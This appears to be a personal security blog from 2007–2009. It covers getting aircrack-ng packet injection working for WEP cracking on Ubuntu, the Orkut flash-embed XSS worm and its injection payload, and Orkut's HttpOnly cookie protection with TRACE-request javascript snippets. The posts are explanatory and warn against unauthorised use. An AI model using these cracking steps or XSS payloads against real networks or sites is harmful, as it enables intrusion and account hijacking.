This article ends here. I know now that breaking the WEP encryption isnt that difficult. Unfortunately at many places wifi is used without any encryption. Anyways the only suggestion from my side is to use strong passwords as of now. I have heard there are other alternatives to WEP available as well but I didnt have a look at them. Will let you know which one is better in terms of security when my research proceeds. In a way this article is incomplete as I didnt mention what needs to be done to ensure that your wifi is secure. Just wait for some more time. :)

Making Packet Injection work on Ubuntu 8.10 (Intrepid Ibex) kernel 2.6.27 on Intel 4965 AG/AGN wireless card

2009-01-09T12:48:00.000+05:30

Primarily I followed the following link to make packet injection work on my new Intrepid Ibex (Ubuntu 8.10) kernel 2.6.27 with an Intel 4965 card on a THinkpad T61.
http://tinyshell.be/aircrackng/forum/index.php?PHPSESSID=395694818ce8f33e9810767d30518a2d&action=printpage;topic=3954.0

Before we start, I should suggest you read the complete document and all posts (the tinyshell link), so that as you complete the reading you will have an idea of what to do and what not to. I am not an expert at giving advice in linux, and so I will only mention the steps that worked for me. You may be required to apply your brains at some places and knowledge about patches etc and why we apply them. Remember I already screwed my Gutsy Gibbon (Ubuntu 7.10) while upgrading the kernel. So be prepared for any such occurences.
THese things happen while learning. :) THats the real fun.

Previously in my Gutsy, I was having a kernel 2.6.22, As I have read so far, packet injection doesn't work properly (http: //tinyshell.be/aircrackng/forum/index.php?topic=3954.0 ) below kernels 2.6.25. Even I had to install the driver for Intel 4965 wireless card. That made my wireless work but even after applying the relevant patches I couldn't make injection work. When I tried to update my kernel through apt-get it showed me some errors. And finally the newer kernel never booted and my 2.6.22 was rendered almost useless.
I never debugged as I was more interested in making injection work somehow.
My next endeavour included downloading Backtrack 3, installing it in a USB drive. But still the injection through aireplay-ng didn't work. I also downloaded the latest Ubuntu 8.10 Intrepid Ibex, which is having a kernel 2.6.27.

The good part is that the driver support for Intel 4965 is included in this kernel. What I read from the Intel site is that driver support for this card (Intel iwl4965) is included in kernels higher than 2.6.24. (http://www.intellinuxwireless.org/?p=iwlwifi) So, no doubt my wireless connection is working well with the default config.

But for making packet injection work, I read through the forum and learned that I need to download the latest compat driver to make injection work.
OK, so I downloaded

http://wireless.kernel.org/download/compat-wireless-2.6/compat-wireless-2.6.tar.bz2

from here:

http://linuxwireless.org/en/users/Download

Besides this there is a mention of separate injection patches for iwl4965 and mac80211 but nevertheless I never needed them. :) (Thanks to alex88)

After downloading the compat driver to my root folder.

tar -jxf compat-wireless-2.6.tar.bz2
cd compat-wireless-2009-01-08/
make
make install

and then reboot!!

After that I set my wireless interface in monitor mode by
airmon-ng start wlan0

The airmon-ng creates another interface mon0 in monitor mode. (NOt sure how and why but there is no need to mess with wlan0 :), something that I realised late :/)
and you can try the packet injection test:

root@r00t3r:/home/hax0r# aireplay-ng -9 mon0
14:41:02 Trying broadcast probe requests...
14:41:02 Injection is working!
14:41:04 Found 0 APs
root@r00t3r:/home/hax0r#

Although it says Injection is working, but it can be misleading as it showed me the same message when I ran it for the first time after patching in my Ubuntu 7.10 Gutsy.

So again went through the forum and used the following commands to reload the driver modules (I don't know why they again installed compat, I think once you have installed it correctly, reloading the modules should do the work)
Go to the compat directory (where you extracted compat driver) and issue the following commands:

make
make install
rmmod iwlagn
rmmod iwlcore
rmmod mac80211
rmmod cfg80211
modprobe iwlagn
modprobe mac80211
modprobe cfg80211

When I again tried the injection test it gave me positive results:

root@r00t3r:/home/aditya# aireplay-ng -9 mon0
19:43:21 Trying broadcast probe requests...
19:43:21 Injection is working!
19:43:22 Found 1 AP

19:43:22 Trying directed probe requests...
19:43:22 xx:xx:xx:xx:xx:xx - channel: 1 - 'Gamtal@280'
19:43:24 Ping (min/avg/max): 9.500ms/40.762ms/70.648ms Power: 167.00
19:43:24 28/30: 93%

As of now I only tried to run 'Interactive frame selection technique' the option 2 of aireplay-ng. And it seemed to work normally. Didn't do other tests, as I don't know the theory part of it. Will try them and let you know later. As of now I am more than elated that somehow injection is working on my machine. :)

Summary
**********
1. No injection patches required. (I havnt checked each and every attack, so this may change depending on the attack, like earliar we used to install specific patch for fakeauth. )
2. Download latest compat driver.
3. Install it using 'make' and 'make install'
4. reboot.

Guidelines
************
5. Make sure the 'Network Manager' of Ubuntu is not using your wireless card for wireless connections. Else while placing the interface in monitor mode, it will give a 'device busy' error. For this, Right Click the 'Network Manager' icon on your system tray and uncheck the enable wireless option. If you don't see the icon you can start it using 'nm-applet' command in the terminal. (as it used to happen in Ubuntu 7.10, the icon goes away sometimes :/)

6. Make sure your card is switched 'ON' if any hardware key exists in your laptop. (yes, this can happen as well :))

Hope this works for you.

BByes for nows. See you laters. :) MUha

Wireless Insecurity

2009-01-08T17:34:00.000+05:30

Noobish Theory for understanding the aircrack suit tools and their purpose:

1. When you are using a personal wireless connection, it typically consists of a small wireless router. THis wireless router emits radio signals which can be detected by a compatible wireless card installed in your laptop/desktop.

2. The normal process is that your laptop (wireless card) connects to the wireless router and thus you can enjoy an internet connection without connecting through a wire (so its called wireless).

3. Now if your neighbour's laptop can detect those signals as well, he can connect to the router and enjoy the free internet connection as well. His internet usage will be billed to you and so your internet bill will shoot to a high.
Plus he/she can use your internet connection for illegal activities like sending fake mails from your ip, downloading pr0n, and hacking.

4. For this purpose the wireless router lets you enable a lame security called WEP and now you can set a 5 char or 13 char long passphrase. THis passphrase is required when you connect to your wireless router. So now, in order to use the internet you or your neighbour must provide the 5/13 char passphrase.

5. This may protect your internet from normal users, but its still insecure due to the inherent weakness in the WEP encryption scheme. So a determined hacker can still break into your wireless network and find the passphrase. THereby enjoying free internet again.

6. If you did some reading on WEP encryption you may have heard of Initialisation Vectors and 64 bit/ 128 bit encryption scheme. Let me tell you, the passphrase in the WEP can be of 5 or 13 characters only. Once you have supplied the passphrase tHe WEP encryption appends 3 more characters to it making it 5+3=8 or 13+3=16 bit passphrase, this 3 char set is known as the Initialisation vector which is generated randomly for each packet. THese 8 or 16 character bytes amount to 8*8=64 or 16*8=128 bits and so its called 64/128 bit encryption.
So the bottomline is:
5 char passphrase means 64 bit WEP encryption and
13 char passphrase means 128 bit WEP encryption.

Needless to say, you must use 128 bit encryption all the times. Although it can be cracked but still, it will take longer time and will involve more skill.

7. Now about the cracking part, the use of weak IVs makes WEP a weak algorithm. (as far as i have heard so far :/) So inorder to crack the passphrase (key) successfully you need to capture a large number of packets. These captured packets will then be fed to the WEP cracking tool called aircrack-ng.
Which if successful will tell you the key.

8. OK, now about the tools purpose.
>>>airmon-ng
Its for setting your wireless interface in monitor mode.
You can do anything only if you have a wireless interface in monitor mode.

>>>Once you have your wireless interface in monitor mode, you can start airodump-ng to capture packets in a file.

>>>Your packet capturing rate will be very slow (in search of packets with weak IVs), and it may take days to crack. For this purpose we employ a new technique called packet injection. We use the tool called aireplay-ng for this purpose.
It will make your wireless card inject wireless packets in the wireless network. Chances are that the wireless router will respond to your injected packets (if they reach the router, your card should be powerful enough) and so the number of captured packets (in airodump-ng) will increase dramatically. Capturing more number of packets in less amount of time increases your chances of cracking the key quickly. Sometimes it can take only 5 minutes as I saw in some videos!!! Depending on the type of encryption in use (64/128) the number of packets to be captured may vary.
BUt let me warn you, packet injection is not that simple as injection support is not there in most of the wireless drivers. You may be required to patch your driver for injection support first, which can be a tiring procedure if you dont know much about linux. If that is the case you may choose Backtrack 3. (details later ;))

>>>Once you have captured a good number of packets you can use the aircrack-ng tool to find the key. Depending on your luck and the hardware config of your computer you may find the key in some time.

Till now I couldnt find any of the keys as I am still busy patching my new INtrepid. My friend has a Mac-book where we enable wep encryption and try our newly learned techniques. Dont do all this on any network that is not yours, it comes under criminal activites and you can be jailed for that. I havnt studied about the alternatives of WEP yet, but I will study them soon. (they exist)

So till then good-bye. I didnt tell you the story about how I screwed my Gutsy Gibbon while patching the driver for injection. :) Thats a hell long story.

See ya then.
Good Bye.

Intel 4965 wifi driver Ubuntu wireless

2009-01-07T17:35:00.000+05:30

Long Break
**************
So here we meet again. :) Almost after 1 year. I had almost forgotten this technoshit during the preparation of CAT. THe results will be out this weekend, my DI score was pathetic, so not many expectations :/. And now I think I am back.

Trying hands at wireless hacking these days. I had an old ubuntu 7.10 "Gutsy Gibbon", which was screwed few days back while updating the kernel. As packet injection is not supported with older kernels (2.6.22) esp in Ubuntu. You know what I feel, if you want to learn wireless hacking, try your hands asap, or else WEP will become obsolete in the coming days and stronger algos wont let you steal the fun.Anyways I aint a supporter of hacking, but I like learning new things esp which give me a technical advantage and a feeling of technical prowess among my peers. ok, lots of shit here. Here is what happened in the last few days:

I have a THinkpad T61 with an Intel iwl4965 wireless card with an Ubuntu 7.10. So from the aircrack forums I got an idea that making wireless hacking work on an intel 4965 card on ubuntu is still under development. In fact some guys said that its impossible with a kernel less than 2.6.25. Mine was 2.6.22 :/ so I tried an array of commands as mentioned in the posts. I am sorry I never saved the links, but you will ultimately reach there, if you search google for intel 4965 wireless hacking ubuntu.OK, I must tell you that in the process I screwed my Ubuntu 7.10, but still I will mention few things that I learnt in the process.

How I made my wireless work on Ubuntu 7.10.

You may be facing some problems with enabling wireless on your Ubuntu. First you need to understand what wireless card is there in your laptop. (Its something for idiots like me, I never knew what card exists inside :/)
From what I learned from the aircrack site (I will try my best to provide the original links at the bottom) articles is that there are many manufactureres of wireless cards in the market. For eg. Netgear, Cisco etc.
A wireless card consists of two main parts:

1. The outer radio device
2. and the internal chipset.

MOst of the wireless card manufactureres dont disclose what internal chipset they are using. But we need to find it out, if we need to install the concerned drivers.

If you dont know what card is there in your laptop, try the command lspci on your terminal. It will give you a list of all pci devices that are there in your laptop.
TRy to find keywords like "wireless"
For eg. this is the output on my laptop:

root@r00t3r:/# lspci
00:00.0 Host bridge: Intel Corporation Mobile PM965/GM965/GL960 Memory Controller Hub (rev 0c)
00:01.0 PCI bridge: Intel Corporation Mobile PM965/GM965/GL960 PCI Express Root Port (rev 0c)
00:19.0 Ethernet controller: Intel Corporation 82566MM Gigabit Network Connection (rev 03)
00:1a.0 USB Controller: Intel Corporation 82801H (ICH8 Family) USB UHCI Controller #4 (rev 03)
00:1a.1 USB Controller: Intel Corporation 82801H (ICH8 Family) USB UHCI Controller #5 (rev 03)
00:1a.7 USB Controller: Intel Corporation 82801H (ICH8 Family) USB2 EHCI Controller #2 (rev 03)
00:1b.0 Audio device: Intel Corporation 82801H (ICH8 Family) HD Audio Controller (rev 03)
00:1c.0 PCI bridge: Intel Corporation 82801H (ICH8 Family) PCI Express Port 1 (rev 03)
00:1c.1 PCI bridge: Intel Corporation 82801H (ICH8 Family) PCI Express Port 2 (rev 03)
00:1c.2 PCI bridge: Intel Corporation 82801H (ICH8 Family) PCI Express Port 3 (rev 03)
00:1c.3 PCI bridge: Intel Corporation 82801H (ICH8 Family) PCI Express Port 4 (rev 03)
00:1c.4 PCI bridge: Intel Corporation 82801H (ICH8 Family) PCI Express Port 5 (rev 03)
00:1d.0 USB Controller: Intel Corporation 82801H (ICH8 Family) USB UHCI Controller #1 (rev 03)
00:1d.1 USB Controller: Intel Corporation 82801H (ICH8 Family) USB UHCI Controller #2 (rev 03)
00:1d.2 USB Controller: Intel Corporation 82801H (ICH8 Family) USB UHCI Controller #3 (rev 03)
00:1d.7 USB Controller: Intel Corporation 82801H (ICH8 Family) USB2 EHCI Controller #1 (rev 03)
00:1e.0 PCI bridge: Intel Corporation 82801 Mobile PCI Bridge (rev f3)
00:1f.0 ISA bridge: Intel Corporation 82801HBM (ICH8M-E) LPC Interface Controller (rev 03)
00:1f.2 IDE interface: Intel Corporation 82801HBM/HEM (ICH8M/ICH8M-E) SATA IDE Controller (rev 03)
00:1f.3 SMBus: Intel Corporation 82801H (ICH8 Family) SMBus Controller (rev 03)
01:00.0 VGA compatible controller: nVidia Corporation Quadro NVS 140M (rev a1)
03:00.0 Network controller: Intel Corporation PRO/Wireless 4965 AG or AGN [Kedron] Network Connection (rev 61)
15:00.0 CardBus bridge: Ricoh Co Ltd RL5c476 II (rev ba)
15:00.1 FireWire (IEEE 1394): Ricoh Co Ltd R5C832 IEEE 1394 Controller (rev 04)
root@r00t3r:/#

As you can see in the bold, the wireless chipset that my card is using.

Now we can google with this name and try to find, if we can install the driver for this card. This guide helped me with the install:

http://ubuntuforums.org/showpost.php?p=2514602&postcount=8

http://ubuntuforums.org/showthread.php?t=471794

I installed ndiswrapper through apt-get.

root@r00t3r:/# apt-get install ndiswrapper-common

After that I downloaded the concerned windows driver from Intel site
I dont really know how the windows driver worked for linux using ndiswrapper.
Never researched about it either.

http://downloadcenter.intel.com/Product_Filter.aspx?ProductID=2753&lang=eng

I downloaded the driver and issued the ndiswrapper commands as mentioned in the link, and after a reboot it started working. (As far as I remember)

So I felt good when I made my wifi work. BUt my aim was to make it work for wireless hacking.

Brief Info of Wireless Tools.

1. In order to see wireless networks, you need to have a tool like NetStumbler/Kismet/Airsnort

Netstumbler is for windows, Airsnort is obsolete. and I liked KIsmet very much.

#apt-get install kismet

you may be required to edit the kismet.conf file (generally in /etc/kismet) by changing the sources parameter. This may depend on your chipset.

MIne worked by changing it to:

source=wlanng,wlan0,kismet

and yes, run it with root privilege, or else change this line with your sudoer, and uncomment it:

#suiduser=your_user_here

Now, kismet is a wonderful tool, so please have a look at the detailed tutorials available on google.

2. THe other tool list is for sniffing wireless packets and cracking them. Whatever I am writing, is by assuming that you already understand how wifi works and why it is insecure. If you dont, then google for the basics of wifi, and in particular weaknesses in WEP (Initialisation vectors (what,why etc)). Or else you wont understand what the tools do.
install the aircrack suit.

#apt-get install aircrack-ng

After installing this suit, you will find the following tools (list not complete):
airodump-ng : for capturing data packets
airmon-ng : for setting your wireless interface in monitor mode
aircrack-ng : for cracking the captured data and finding the keys
aireplay-ng : for injecting packets

Please note that I am a noob as well, I might be missing some important tool or the explanation may not be that good, but this is the idea that I got after 1 week of play. :)

2008-01-25T14:19:00.000+05:30

Yet another XSS, yet another w0rm!

December 18-19 2007 was like a nightmare for orkut. Some bad code was executing behind the browsers of orkut users.This is about the worm outbreak which affected more than 600000 orkut users within a night. Although the worm was relatively harmless, it just demonstrated again, how disastrous a simple flaw can become, if it concerns persistent XSS. These days you may get a lot of search results if you search for "orkut scrapbook xss", but at that time the news wasnt that widespread.It was received as a hot cake by many who were in search of a good XSS to be discovered. And the only source of information was a few hacking communities on orkut and of course the infected scrapbooks.

Well for the first time when I heard of that embedded flash XSS I was a bit perplexed, I knew few things about XSS and I didnt even know how to embed a flash object in someone's scrapbook. When Orkut introduced the concept of embedding flash objects in scrapbooks, i never had a look on it, may be I never knew about the possibilities of XSS involved while embedding flash objects or simply because I wasnt interested in making flashy colorful scraps to orkut friends. But the vulnerability wasnt a very incredible one. If you search about flash XSS in general, you will find many good articles discussing about the common errors that can happen. And even one of these articles date back to 2003. So the concept isnt very new. Orkut embedded flash XSS vulnerability seems just to be another case.

Even other social networking websites like Myspace was hit by a flash worm in 2006. But the functionality of Myspace worm was far different from this worm.

The worm didnt do any harm to anyone, even if you dont know much about the technical workings of traditional viruses and worms, still you can have an idea on how web based worms work.
Here is the modus-operandi of the orkut worm...

1.It will appear in a scrapbook as a scrap

2.Normally orkut does not allow to scrap any executable code (javascript in most cases) in scrapbook. But because of the flaw in the handling of flash objects by the orkut filter, this worm code gets into your scrapbook.

3.Now whoever opens that scrapbook will have that javascript code executed. The code instructs the browser (Internet Explorer or Mozilla or any other) to (1) send the same infected scrap to all the friends in the friend list and (2) to join a community "Infectados pelo Vírus do Orkut" just for the sake of counting of infected profiles.

Still the simple vulnerability could have been exploited in more dangerous way by simply redirecting them to a fake orkut login page. Although this version was a harmless one.And thanks to orkut for making their cookies safe (httpOnly), otherwise it could have a devastating effect. As I discussed in my previous article how orkut tightened the security of its cookies by making them inaccessible to javascript.

As for the technical details, the injection of code in this case reminds me of SQL injections. When you are embedding a flash object in the scrapbook, it is required that you paste the exact html code for embedding a flash object. Orkut handles the code in its own way and makes it appear in the scrapbook. Though I am not great at embedding flash files in html, but I know where the problem occurred. Suppose you are embedding a scrap with a flash file xss.swf on example.com. Then you will have to paste the following code in the scrapbook.

<embed src="http://example.com/xss.swf" type="application/x-shockwave-flash" wmode="transparent" width="10"
height="10"></embed>

After submitting the scrap. You can view the source of scrapbook and you will find the orkut implemented code:

<script type="text/javascript"> var flashWriter = new _SWFObject('http://example.com/xss.swf', '704557008', '10', '10', '9', '#FFFFFF', 'autohigh', '', '', '704557008'); flashWriter._addParam('wmode', 'transparent/e');flashWriter._addParam('allowNetworking','internal');flashWriter._addParam('allowScriptAccess', 'never'); flashWriter._setAttribute('style', ''); flashWriter._write('flashDiv704557008');</script>

Here it implements its own object called _SWFObject for handling flash files, and picks the parameters as the user provided. The problem occured because orkut never sanitized or may be incorrectly sanitized the input parameters that the user was providing. It did not validate correctly the wmode parameter. As a result it became possible to inject any javascript code if it is appended correctly to the "transparent" value
For example we could replace the "transparent" by "transparent');alert('xss" . So that our scrap to be posted looks like this.

<embed src="http://example.com/xss.swf" type="application/x-shockwave-flash" wmode="transparent'); alert('xss" width="10"
height="10"></embed>

and after posting, in the scrapbook source it would look like this...

<script type="text/javascript"> var flashWriter = new _SWFObject('http://example.com/xss.swf', '704557008', '10', '10', '9', '#FFFFFF', 'autohigh', '', '', '704557008'); flashWriter._addParam('wmode', 'transparent');alert('xss'); flashWriter._addParam('allowNetworking', 'internal'); flashWriter._addParam('allowScriptAccess', 'never'); flashWriter._setAttribute('style', ''); flashWriter._write('flashDiv704557008');</script>

See the alert box looks so beautiful when embedded successfully in orkut page code.:D
This is just an explanation of how the problem occurred and how it was exploited. If you try it now then orkut will successfully filter it out. The correction was made pretty quickly, i think it didnt took more than 2 days. As I already told you that orkut is getting smart day by day.
If you have a question that how can we protect ourselves from such web-based worms? Or how can we ensure that harmful scripts dont run on our browser..then the answer is that there is no such full proof solution. One thing that I didnt mention till now is perhaps the most imporatnt thing I wanted to focus on. Despite the widespread effect of worm and so many of my orkut friends getting infected and unknowingly joining the community "Infectados pelo Vírus do Orkut", I didnt get a single infection. Though I searched like hell on orkut and unknowingly visited infected scrapbooks, I was still not infected. My browser doesnt allow any kind of hidden code to run on my machine without my permission.
Yes the lesson of the story is I used a firefox extension called Noscript. Almost every website today uses javascript to provide greater functionality to the users. But things dont end here, a lot can happen over small code of javascript :D, as was the case of Myspace and orkut worms. Noscript is a small utility that blocks any kind of script to run without your permission. This way you can select the websites that you trust and allow only those that provide you added functionality. It helps greatly while browsing unknown sites listed by google. And believe me you will feel a lot more secure once you understand its working and the safety it offers. It also provides security against common XSS attacks and other harmful code executions. It certainly helps in blocking the most common XSS attacks, where your security can be compromised if if the site is a trusted one.

I you are interested in the exact javascript code that the virus used then you can read the article from symantec. I must say, the javascript code is heavily obfuscated. You will have to scratch your head for understanding it. And also I have given the link for noscript firefox addon. So just install the latest version of noscript and make your firefox a lot more safer. Happy Browsing! :)

Special Thanks to Mr. Nobody.

https://addons.mozilla.org/en-US/firefox/addon/722

http://www.symantec.com/enterprise/security_response/weblog/2007/12/the_orkut_worm_has_landed.html

2007-11-26T13:38:00.000+05:30

Technical explanation for failure of Orkut cookie exploits
Why I am writing this...

Hi all. For the past few days and weeks I was studying about orkut cookie exploits and the familiar javascripts which when pasted in browser steal the cookie. Although I believe orkut is safe as of now, unless someone comes up with a new technique to bypass the new security feature. I believe these tricks used to work till August 2007,even somewhere somehow near in May 2007 I found my cookie being transferred to an anonymous account on orkut.
That sob deleted my 15 scraps. Perhaps I used some flooding script without understanding the content. I didn’t know much about cookies at that time. Anyways these tricks dont work now. because even if you type alert(document.cookie) in your browser URL, you get some cookie values but not the admired one called orkut_state. I studied a few interesting things and thought of sharing some useful info. The basic intent is to make normal users understand the dangers of cookie stealing, how to avoid that, and what orkut is doing to prevent cookie theft.

Yummy!!! I luv your cookie..........

This is an introductory tutorial for those who dont know about cookie stealing and the science behind that and also for those who would like to know how it used to work and why it doesnt work now. Now if you dont know what a cookie is then read the next few lines. Whenever you login into orkut with your account and password, orkut gives you a cookie which stores some information about your session. It means for all the further requests that you make to orkut you dont need to give that username/password everytime, you just send the cookie that orkut gave you in the beginning. In this way orkut keeps a track of its legitimate users. When you log out, orkut destroys this cookie so that no one can access your account unless he/she provides your username/password and gets a new cookie valid for that session.Imagine if somehow some bad person like me gets hold of your cookie. Now I can send orkut your cookie to orkut and orkut will think its you who has requested a page and not the bad person. The result is simple to understand: even if I dont know your username/password still I can still login into your account and do whatever shit I want to, provided that I have your cookie.

A typical scenario which used to occur some time back on orkut: someone sends you a javascript and says that run this after pasting in your browser URL to see "cool effects". Never run that unless you understand Javascript and you what what exactly it is going to do. It may contain a hidden malicious code which can transfer your cookies to the attacker. This is not only for orkut but also for any other site. A more dangerous exploit was in circulation in late 2006, due to an XSS bug in orkut whose sole intent was to steal cookies, and transfer the ownership of the community. As a result some big communities were hacked. And people used to ask, how to get their communities back.

How to see a cookie.............

You can see the cookies of any other site by opening that site, and typing javascript:alert(document.cookie) in the browser. The sites store some additional cookies if log in with a userid and password to track that you are an authenticated user. You can also see all the cookies stored in Internet explorer in "C:\Documents and Settings\Administrator\Cookies" and in Firefox "C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\xxxxxxx.default\cookies.txt".

Muhahahaha....So how can I hack her account....

I know most of the evil minds must be jumping right now thinking about how to get the cookies of their girlfrnd. And girlfrnds, dump these guys if you know their malicious intents...lol...So malicious Dude..you cannot do it now as orkut has already taken care of your malicious intents. :D So now if you want to see your orkut cookie you can type "javascript:alert(document.cookie)" without quotes in the URL of your browser where orkut page is already loaded. After you hit enter you will see an alert box showing you some values. This is the information stored in your cookie.(_utma,_utmb,_utmc,_utmz,TZ) But wait, the interesting part is yet to come. What you see is not the complete cookie.
The precious orkut_state cookie is missing.

Orkut_state ...Hmmm

Out of the six cookies on your computer stored by orkut, (_utma,_utmb,_utmc,_utmz,TZ, orkut_state) orkut_state is responsible for the identification of the user. Well orkut_state is the cookie which is destroyed when you log out from orkut. Unfortunately this cookie remains active on the orkut server for around 14 days. That is if someone got your orkut_state using malicious javascript or else then he/she can login in to your account on orkut. Earlier the orkut_state cookie captured by an attacker would be stored using cookie editor in the attacker's browser (typically mozilla) and saved. After that the attacker goes for www.orkut.com/Home.aspx and voilla!! He is in
the home of the victim.

HttpOnly....TechnoShit!!!!

Orkut seems to be getting intelligent in terms of handling cookies. Now with the new security feature added, Even if you manage to run a javascript in the victim's browser you dont get orkut_state value. How this happened?? Well this is the new cookie protection of orkut for saving its innocent users from prying eyes. Although its not like orkut has stopped the use of orkut_state, if you use Firefox you can use an add-on called cookie editor. From the cookie editor you can see all the cookies that orkut has stored on your computer. If you are logged into orkut you can see 6 cookie values (the sixth and the important one being orkut_state) in the cookie editor. So how this 6th cookie became invisible to our javascript? The answer came after understanding the headers exchanged between my browser and orkut.com when I was logging in.
For this you will require another userful addon for Firefox called "Live http hearders". During logging in and capturing the headers, I got two useful headers where the orkut cookies can be seen. After google successful authentication you are redirected to orkut where orkut sets its own cookies.

==========================================================================
GET /RedirLogin.aspx?msg=0&auth=DQAAAHUAAADgfXp8G6ymWC35cNERFjIJD0ITpC9mLiofGy1ur0I6
jkeSdIgZQR9hth2wHVecjHstHm5wUfl_g4-Gji-6MmglgCnf3fp_e1pc3GiWS4G0x1tFh5O8NGnpAdzWH
zCJDiIEHfOCCqMDlXdT8XxIOezFc2UYQkaY-70L-l2Iqb_-ng HTTP/1.1
Host: www.orkut.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.9) Gecko/20071025 (CK-IBM) Firefox/2.0.0.9
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Cookie: __utmb=85909575.0; __utma=85909575.458437098.1194587408.1194587408.1194587408.1; __utmz=85909575.1194587408.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmc=85909575.0; TZ=-330
========================================================================

Although in the previous headers surprisingly there was no orkut_state, and it became very clear why, after watching the next header.

========================================================================
HTTP/1.x 302 Moved Temporarily
Cache-Control: no-cache, must-revalidate, no-cache="Set-Cookie", private
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Set-Cookie: orkut_state=ORKUTPREF=ID=XXXXXXXXXXXXXXXXXXX:INF=0:SET=111236588:LNG=1:
CNT=16:RM=0:USR=Z2VudHVpX3NvcGthQXXXXGlmZm1haWwuY29t:PHS=:TS=1145665351:
LCL=en-US:NET=1:TOS=2147483647:GC=DQAAAHQAAABaeE29AFA9Q2Y4xxxxxLk9vbqGlpxF
3DzzLJgCNWJGyEe_mMzOxxxxx6TK7NpktZYx6KgCsjT6Mbdoz7l-si5z23qknQOqKRQRNLyf5gpnPix
UVrsuJlikrr2o2Gzo-XF-_atZXl9xJRpZRr_FDHZ_i8qow_HgPzhZ4vo4rfg:PE=Z2VudHVpX3NvcGthQH
JlZGlmZm1haWwuY29t:GTI=0:GID=:VER=2:AST=1:SID=0:S=F2oSxzVWAx5wji0y75HyNYSFtq0=:; Domain=www.orkut.com; Path=/; HttpOnly
Set-Cookie: orkut_state=; Domain=.orkut.com; Expires=Thu, 08-Nov-07 06:42:31 GMT; Path=/; HttpOnly
Content-Type: text/html; charset=UTF-8
Location: http://www.orkut.com/Home.aspx?
Content-Encoding: gzip
Content-Length: 179
Server: GFE/1.3
Date: Fri, 09 Nov 2007 06:42:31 GMT
=====================================================================

The five orkut cookies are placed normally, but orkut_state is sent in a seperate header with an additional tag in the name of "HTTPOnly".As we can see the orkut_state content, in the end there is a tag attached called 'HttpOnly'. This is interesting as it wasnt there in previous cookie values. A little googling will tell you that the 'HttpOnly' tag instructs the browser to disallow javascript from accessing the content of this cookie. In fact this is a feature introduced by MicroSoft few years back in Internet Explorer 6 for protection from Cross site scripting attacks. Although there are few techniques by which you can bypass 'HttpOnly' like requesting the
http headers using the TRACE method,
(reference to http://www.cgisecurity.com/whitehat-mirror/WH-WhitePaper_XST_ebook.pdf
by Jeremiah Grossman) the TRACE method is aqn HTTP method which is generally used for debugging purpose. If a client sends a TRACE request to a web server and the webserver supports TRACE requests, then it echoes back the header sent by the client. In a typical XSS scenario, the attacker may send a link to the user of vulnerable site,(that supports TRACE method and uses HttpOnly protection for cookies) which when clicked may send a TRACE request to the webserver and the echoed response by the webserver can be captured by the attacker. Fortunately they not possible in case of Orkut as of now for two good reasons.

1.Most of the browsers like the popular ones Firefox and IE donot support TRACE for obvious security reasons.(Though it was possible earlier for IE)
2.Orkut does not entertain a TRACE request at all.

The following functions can explain this:
For Firefox:

javascript:var xll;function load(url){xll=new XMLHttpRequest();xll.open("TRACE",url,false); xll.send(null);
var doc=xll.responseText;alert(doc);}load('http://www.orkut.com/');

For IE:

javascript:var xll;function load(url){xll=new ActiveXObject("Microsoft.XMLHTTP"); xll.open("TRACE",url,false);xll.send(null);var doc=xll.responseText;alert(doc);} load('http://www.orkut.com/');

Its not a surprise that nothing will happen when you paste them in URL and test. Ensure that orkut is already open in the browser because no browser allows cross domain AJAX requests for obvious security reasons. After hitting enter, For IE at the bottom of page you see "Error on page" and for Firefox (If you have installed FireBug it will clearly show an exception marked read.

"uncaught exception: [Exception... "Component returned failure code: 0x80070057
(NS_ERROR_ILLEGAL_VALUE) [nsIXMLHttpRequest.open]" nsresult: "0x80070057 (NS_ERROR_ILLEGAL_VALUE)" location: "JS frame :: javascript: eval(__firebugTemp__); :: anonymous :: line 1" data: no]")

You can change the TRACE with GET and see the alert box popping out the content.
Though this may not work with orkut but still there are many webservers which allow TRACE requests by default. And if somehow the browser can be tricked into sending the TRACE request, combined with an XSS flaw, it can have a devastating effect on the vulnerable site's users. It just a theoretical idea, not an actual threat.

So as of now your orkut cookies seem to be safe. There were some ideas to test with the TRACE method but they werent looking much exciting. You can read the below mentioned articles which I studied. And a list of Firefox addons that are very helpful for analysing and debugging. The list is a long one and I have stated only those which I used now.

Date:23 Nov 2007
Aditya Lad.

References:
http://www.webappsec.org/lists/websecurity/archive/2006-01/msg00056.html
http://www.cgisecurity.com/lib/XmlHTTPRequest.shtml
http://www.owasp.org/index.php/Testing_for_HTTP_Methods_and_XST
http://www.cgisecurity.com/whitehat-mirror/WH-WhitePaper_XST_ebook.pdf
http://www.w3schools.com/ajax/default.asp

Useful Firefox addons:
Cookie editor : https://addons.mozilla.org/en-US/firefox/addon/573
Live HTTP Headers : https://addons.mozilla.org/en-US/firefox/addon/3829
FireBug: https://addons.mozilla.org/en-US/firefox/addon/1843

2007-09-04T15:20:00.000+05:30

I dont want to make this blog a personal diary kinda thing...wait for some time and we ll discuss about technology..kindly save ur ass 0r u ll be kicked out of this channel...set ur egos aside and do check ur senses for any buffer overflow condition before coming to me....bo may lead to memory corruption in ur mind which may further lead to Dos kinda situation...Me and my son *nux will be ur h0st for tonite.. c'mon we ll together ride the marvels of science tonite. Happy sucking!!!!

2007-08-28T18:53:00.000+05:30

That was luck coming ma way...
and I was happy cuz I saw genie after a long time that day...

2007-08-28T18:16:00.000+05:30

-bash-3.1# whoami
#root
-bash-3.1#